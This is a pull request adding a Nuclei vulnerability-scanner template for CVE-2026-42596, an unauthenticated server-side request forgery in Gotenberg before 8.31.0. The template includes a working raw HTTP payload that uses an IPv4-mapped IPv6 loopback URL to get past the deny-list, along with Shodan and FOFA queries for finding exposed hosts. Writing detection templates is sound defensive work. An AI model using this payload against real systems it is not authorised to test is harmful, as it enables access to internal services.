### PR TITLE
Add CVE-2026-42596 template

### DIFF
--- a/http/cves/2026/CVE-2026-42596.yaml
+++ b/http/cves/2026/CVE-2026-42596.yaml
@@ -1,46 +1,46 @@
-id: cve-2026-42596-gotenberg-ipv4-mapped-ipv6-ssrf
+id: CVE-2026-42596
 
 info:
-  name: Gotenberg Unauthenticated IPv4-Mapped IPv6 SSRF (CVE-2026-42596)
+  name: Gotenberg < 8.31.0 - Server-Side Request Forgery
   author: str4k3r
   severity: critical
-  description: >
-    Gotenberg versions before 8.31.0 apply a textual deny-list to
-    downloadFrom URLs and fail to recognize IPv4-mapped IPv6 loopback
-    addresses. The unauthenticated downloadFrom API therefore fetches its own
-    health endpoint when given an IPv4-mapped loopback URL. Because that
-    endpoint does not provide a Content-Disposition header, the vulnerable
-    version returns the downstream-fetch error; fixed versions reject the
-    private destination before fetching it.
+  description: |
+    Gotenberg before 8.31.0 is vulnerable to server-side request forgery (SSRF) due to insufficient validation of URLs in the downloadFrom API. An unauthenticated attacker can exploit the flaw by providing specially crafted IPv4-mapped IPv6 addresses (such as http://[::ffff:127.0.0.1]) that bypass the deny-list and allow access to internal resources. Fixed versions properly recognize these addresses and prevent such requests.
   reference:
     - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-4vmc-gm8v-m35h
     - https://nvd.nist.gov/vuln/detail/CVE-2026-42596
   classification:
     cve-id: CVE-2026-42596
+    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cwe-id: CWE-918
+    cpe: cpe:2.3:a:gotenberg:gotenberg:*:*:*:*:*:*:*:*
   metadata:
     max-request: 1
     verified: true
-  tags: cve,cve2026,gotenberg,ssrf,ipv6,unauth
+    shodan-query: "Gotenberg"
+    fofa-query: "Gotenberg"
+  tags: cve,cve2026,gotenberg,ssrf
 
 http:
   - raw:
       - |
         POST /forms/libreoffice/convert HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=----CVE42596Boundary
-        Connection: close
+        Content-Type: multipart/form-data; boundary=----testBoundary
 
-        ------CVE42596Boundary
+        ------testBoundary
         Content-Disposition: form-data; name="downloadFrom"
 
         [{"url":"http://[::ffff:127.0.0.1]:3000/health"}]
-        ------CVE42596Boundary--
+        ------testBoundary--
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 400
+
       - type: word
         part: body
         words:

--- a/http/cves/2026/CVE-2026-42596.yaml
+++ b/http/cves/2026/CVE-2026-42596.yaml
@@ -37,11 +37,11 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 400
-
       - type: word
         part: body
         words:
           - "No 'Content-Disposition' header from 'http://[::ffff:127.0.0.1]:3000/health'"
+
+      - type: status
+        status:
+          - 400

--- a/http/cves/2026/CVE-2026-42596.yaml
+++ b/http/cves/2026/CVE-2026-42596.yaml
@@ -1,0 +1,47 @@
+id: cve-2026-42596-gotenberg-ipv4-mapped-ipv6-ssrf
+
+info:
+  name: Gotenberg Unauthenticated IPv4-Mapped IPv6 SSRF (CVE-2026-42596)
+  author: str4k3r
+  severity: critical
+  description: >
+    Gotenberg versions before 8.31.0 apply a textual deny-list to
+    downloadFrom URLs and fail to recognize IPv4-mapped IPv6 loopback
+    addresses. The unauthenticated downloadFrom API therefore fetches its own
+    health endpoint when given an IPv4-mapped loopback URL. Because that
+    endpoint does not provide a Content-Disposition header, the vulnerable
+    version returns the downstream-fetch error; fixed versions reject the
+    private destination before fetching it.
+  reference:
+    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-4vmc-gm8v-m35h
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-42596
+  classification:
+    cve-id: CVE-2026-42596
+    cwe-id: CWE-918
+  metadata:
+    max-request: 1
+    verified: true
+  tags: cve,cve2026,gotenberg,ssrf,ipv6,unauth
+
+http:
+  - raw:
+      - |
+        POST /forms/libreoffice/convert HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----CVE42596Boundary
+        Connection: close
+
+        ------CVE42596Boundary
+        Content-Disposition: form-data; name="downloadFrom"
+
+        [{"url":"http://[::ffff:127.0.0.1]:3000/health"}]
+        ------CVE42596Boundary--
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 400
+      - type: word
+        part: body
+        words:
+          - "No 'Content-Disposition' header from 'http://[::ffff:127.0.0.1]:3000/health'"


### PR DESCRIPTION
Adds the Nuclei template for **CVE-2026-42596** as an ecosystem contribution.
The template follows the repository format and references the public advisory.